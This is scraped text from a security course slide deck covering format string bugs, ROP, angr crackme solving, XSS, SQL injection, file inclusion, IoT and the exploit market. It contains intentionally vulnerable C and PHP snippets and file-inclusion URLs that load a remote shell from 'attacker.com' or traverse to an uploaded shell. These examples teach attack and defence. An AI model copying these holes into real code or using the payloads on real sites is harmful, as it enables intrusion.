http://www.cbi.umn.edu/securitywiki/CBI_ComputerSecurity/MechanismCanary.html
![Page 82: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/82.jpg)
Format String Exception#include <stdio.h>
int main(int argc, char* argv[]) { if( argc < 2 ) { printf("Enter the command Argument\n"); } else { printf(argv[1]); } return 0;}
What can possibly go wrong?
https://resources.infosecinstitute.com/format-string-bug-exploration/
![Page 83: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/83.jpg)
![Page 84: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/84.jpg)
Format String Exception
https://resources.infosecinstitute.com/format-string-bug-exploration/
![Page 85: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/85.jpg)
PLT and GOT● When a shared library function is called by a program, the address called is
an entry in the Procedure Linking Table (PLT)● The address contains an indirect jump to the addresses contained in variables
stored in the Global Offsets Table (GOT)● The first time a function is called, the GOT address is a jump to code that
invokes the linker● The linker does its magic and updates the GOT entry, so next time the
function is called it can be directly invoked● Note that the PLT is read-only, but the GOT is not
○ Note: The GOT can be made read-only using the RELRO hardening compilation option
![Page 86: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/86.jpg)
![Page 87: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/87.jpg)
Ok, we can control the Instruction Pointer. Now what?● Return to Stack (Ret2Stack)
○ We can write instructions in a buffer in the stack and then point the IP there○ Defense: non-executable stack
● Return to C Library (Ret2Libc)○ Libc is already executable, and it’s somewhere○ Libc might contain pieces that should not be invoked (like spawning a shell)○ Defense: Address space layout randomization (ASLR)
● Return Oriented Programming (ROP)○ We can identify parts of code in libraries (already executable) that are not even complete
functions, are just a few assembly instructions terminated by a return (gadget)○ By chaining these gadgets we can execute what we want○ Defense: Control-Flow Integrity
![Page 88: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/88.jpg)
Binary Analysis Techniques
● Static Analysis
● Dynamic Analysis
● Fuzzing
● Symbolic Analysis
![Page 89: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/89.jpg)
Static Analysis● Static analysis is a technique to analyze programs that does not involve
executing the program
● Control-flow analysis
○ Analyzes how the program execution is transferred across the program components
■ Control-flow graph
● Data-flow analysis
○ Analyzes what data values can be assumed by specific data stores (e.g., variables) at various points in the program
![Page 90: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/90.jpg)
Dynamic Analysis● Dynamic analysis is a technique that analyzes a program by observing its
execution
● The advantage of dynamic analysis is that concrete execution provides an instance of what input brought the program in certain state
○ M1 = decrypt(M)addr = load(M1)jump addr
● The disadvantage of dynamic analysis is that one can only prove properties about the code that has been executed
![Page 91: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/91.jpg)
Static Analysis
● objdump
![Page 92: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/92.jpg)
Static Analysis
● objdump● IDA
![Page 93: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/93.jpg)
Static Analysis Dynamic Analysis
● objdump● IDA
● gdb (& friends)
![Page 94: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/94.jpg)
Static Analysis Dynamic Analysis
● objdump● IDA
● gdb (& friends)● radare2
![Page 95: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/95.jpg)
Limitations
![Page 96: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/96.jpg)
Limitations
![Page 97: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/97.jpg)
Limitations
![Page 98: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/98.jpg)
Fuzzing
![Page 99: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/99.jpg)
Symbolic Analysis to the rescue!
![Page 100: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/100.jpg)
https://angr.io
![Page 101: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/101.jpg)
https://angr.io
![Page 102: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/102.jpg)
https://angr.io
![Page 103: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/103.jpg)
https://angr.io
![Page 104: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/104.jpg)
https://angr.io
![Page 105: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/105.jpg)
![Page 106: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/106.jpg)
start
end
avoid
avoid
![Page 107: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/107.jpg)
start
end
avoid
avoid
![Page 108: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/108.jpg)
angrhttps://angr.io
![Page 109: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/109.jpg)
What is angr?● Binary analysis Framework written in python combining both static and
symbolic dynamic analysis (“concolic analysis” from concrete and symbolic)
● Developed by UCSB (third place DARPA Cyber Grand Challenge)
● Based on VEX (Valgrind), can be used on many architectures
● Analysis flow:
○ The executable is loaded in the framework
○ The assembly code is lifted to an intermediate representation
○ The analysis is performed
![Page 110: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/110.jpg)
How to use it?
![Page 111: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/111.jpg)
ais3 crackme● https://github.com/angr/angr-doc/tree/master/examples/ais3_crackme
● We execute the binary with an argument
● If the argument is correct
○ stdout: “Correct! that is the secret key!”
● Else
○ stdout: “I’m sorry, that’s the wrong secret key!”
![Page 112: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/112.jpg)
Target
![Page 113: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/113.jpg)
Target
![Page 114: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/114.jpg)
Target
![Page 115: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/115.jpg)
import angr, claripyproject = angr.Project("./ais3_crackme")
![Page 116: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/116.jpg)
import angr, claripyproject = angr.Project("./ais3_crackme")
# create an initial state with a symbolic bit vector as argv1argv1 = claripy.BVS("argv1", 100*8) # 100 bytesinitial_state = project.factory.entry_state(args=["./ais3_crackme", argv1])
![Page 117: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/117.jpg)
import angr, claripyproject = angr.Project("./ais3_crackme")
# create an initial state with a symbolic bit vector as argv1argv1 = claripy.BVS("argv1", 100*8) # 100 bytesinitial_state = project.factory.entry_state(args=["./ais3_crackme", argv1])
# create a path group using the created initial statesm = project.factory.simulation_manager(initial_state)
# symbolically execute the program until we reach the wanted value of the IPsm.explore(find=0x400602) # find a way to reach the addressfound = sm.found[0]
![Page 118: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/118.jpg)
import angr, claripyproject = angr.Project("./ais3_crackme")
# create an initial state with a symbolic bit vector as argv1argv1 = claripy.BVS("argv1", 100*8) # 100 bytesinitial_state = project.factory.entry_state(args=["./ais3_crackme", argv1])
# create a path group using the created initial statesm = project.factory.simulation_manager(initial_state)
# symbolically execute the program until we reach the wanted value of the IPsm.explore(find=0x400602) # find a way to reach the addressfound = sm.found[0]
# ask the symbolic solver the value of argv1 in the reached state as a stringsolution = found.solver.eval(argv1, cast_to=bytes)print(repr(solution))
![Page 119: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/119.jpg)
import angr, claripyproject = angr.Project("./ais3_crackme")
# create an initial state with a symbolic bit vector as argv1argv1 = claripy.BVS("argv1",100*8) # 100 bytesinitial_state = project.factory.entry_state(args=["./ais3_crackme", argv1])
# create a path group using the created initial statesm = project.factory.simulation_manager(initial_state)
# symbolically execute the program until we reach the wanted value of the IPsm.explore(find=0x400602) # find a way to reach the addressfound = sm.found[0]
# ask the symbolic solver the value of argv1 in the reached state as a stringsolution = found.solver.eval(argv1, cast_to=bytes)print(repr(solution))
![Page 120: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/120.jpg)
$ python3 solve.py ais3{I_tak3_g00d_n0t3s}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
![Page 121: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/121.jpg)
angr references
● angr: https://github.com/angr
● angr-doc: https://github.com/angr/angr-doc
● angr-course: https://github.com/angr/acsac-course
● z3: https://github.com/mwrlabs/z3_and_angr_binary_analysis_workshop
● https://www.slideshare.net/bananaappletw/triton-and-symbolic-execution-on-gdbdef-con-china-97054877
![Page 122: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/122.jpg)
Web Security
![Page 123: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/123.jpg)
![Page 124: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/124.jpg)
Cross Site Scripting (XSS)
![Page 125: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/125.jpg)
Cross Site Scripting (XSS)
Defenses:
● Application Filters (htmlentities)
● HTML Purifiers
![Page 126: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/126.jpg)
● A database is a structured collection of data that is accessed by one or more applications
● Databases typically contain critical information to the business
SQL Injection
● Goal is to extract information from database (but can also modify / delete data)
● One of the most common types of attack
● Exploited by sending unexpected input to insecure web applications
SQL Injection (SQLi)
![Page 127: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/127.jpg)
SQL Injection (SQLi)
![Page 128: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/128.jpg)
SQL Injection Defenses (Prepared Statements)
![Page 129: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/129.jpg)
Remote File Inclusion (RFI)Remote File Inclusion (RFI) is a type of vulnerability that allows an attacker to include a remotely hosted file, usually through a script on the web server.
https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion
http://victim.com/index.php?page=home
index.php
$page = $_REQUEST["page"];include($page.".php");
http://victim.com/index.php?page=http://attacker.com/shell.php
![Page 130: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/130.jpg)
Local File Inclusion (LFI)Local File Inclusion (LFI) is the process of including files, already locally on the server, through exploiting of vulnerable inclusion procedures.
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
http://victim.com/index.php?page=home
index.php
$page = $_REQUEST["page"];include("pages/".$page.".php");
http://victim.com/index.php?page=../../avatars/shell.php
![Page 131: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/131.jpg)
Cross Site Request Forgery (CSRF)
![Page 132: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/132.jpg)
CSRF Tokens
![Page 134: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/134.jpg)
IoT Vulnerabilities
![Page 135: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/135.jpg)
The “S” in “IoT” stands for Security.
![Page 136: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/136.jpg)
Misconfiguration /Not secure firmware1. Weak, guessable, or hard-coded passwords.
2. Insecure network services.
3. Lack of secure update mechanisms.
4. Use of insecure or outdated components.
5. Insecure data transfer and storage
![Page 137: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/137.jpg)
Shodan.io
Shodan is a search engine that lets
the user find specific types of
computers (webcams, routers,
servers, etc.) connected to the
internet using a variety of filters.
![Page 138: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/138.jpg)
Mirai Botnet
Mirai (Japanese: 未来, lit.
'future') is a malware that
turns networked devices
into remotely controlled
bots that can be used as
part of a botnet in large
scale network attacks.
2016: Dyn DNS outage
![Page 139: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/139.jpg)
Machine Learning Security
![Page 140: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/140.jpg)
“Adversarial Machine Learning is a novel research area that lies at the intersection of machine
learning and computer security.”
![Page 141: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/141.jpg)
Adversarial Machine Learning
![Page 142: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/142.jpg)
Adversarial Machine Learning
![Page 143: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/143.jpg)
Adversarial ML - Physical Attacks
Image taken from https://www.cs.cmu.edu/~sbhagava/papers/face-rec-ccs16.pdf
![Page 144: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/144.jpg)
Adversarial ML - Physical Attacks
Image taken from https://arxiv.org/pdf/1712.09665.pdf
![Page 145: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/145.jpg)
The Vulnerability Market
![Page 146: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/146.jpg)
Zero-Day
A Zero-day (also known as 0-day) vulnerability
is a computer-software vulnerability that is
unknown to, or unaddressed by, those who
should be interested in mitigating the
vulnerability.
Big vendors are so interested in keeping their
software secure that have dedicated teams to
find security vulnerabilities in other software.
Project Zero
![Page 147: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/147.jpg)
Exploitscan be soldZERODIUM: exploit acquisition
platform for zero-days.
ZERODIUM customers are
government organizations
(mostly from Europe and North
America) in need of advanced
zero-day exploits.
![Page 148: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/148.jpg)
Mobile exploits are paid more
Mobile devices now hold
very valuable information
and thus, mobile exploits
are much more valuable
(with Android being the
most valued).
![Page 149: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/149.jpg)
Cyber-Weapons:The Stuxnet Case
![Page 150: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/150.jpg)
![Page 151: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/151.jpg)
THANK YOU